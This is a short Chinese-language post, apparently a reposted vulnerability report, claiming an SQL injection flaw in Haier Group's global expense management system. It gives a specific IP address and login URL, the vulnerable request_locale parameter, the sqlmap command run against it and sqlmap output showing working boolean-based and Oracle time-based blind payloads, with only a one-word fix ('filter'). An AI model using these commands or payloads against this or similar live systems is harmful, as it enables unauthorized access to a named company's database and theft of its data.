海尔集团费用管理系统存在SQL注入漏洞
程序员文章站
2022-04-07 09:53:15
海尔集团费用管理系统存在SQL注入漏洞
# 漏洞网站 海尔全球费用管理系统
http://27.223.70.16:443/gems/security/loginInit.action...
# 漏洞网站 海尔全球费用管理系统
http://27.223.70.16:443/gems/security/loginInit.action
# 注入点
http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US
# 注入参数
request_locale
python sqlmap.py -u "http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US'" --dbms oracle
sqlmap resumed the following injection point(s) from stored session: --- Parameter: request_locale (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: request_locale=en_US' AND 1286=1286-- qGIA Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: request_locale=en_US' AND 2334=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(75)||CHR(116)||CHR(66),5)-- BIBG --- [19:44:44] [INFO] the back-end DBMS is Oracle web application technology: Nginx back-end DBMS: Oracle
解决方案:
过滤
上一篇: 二货有点多,别笑岔气了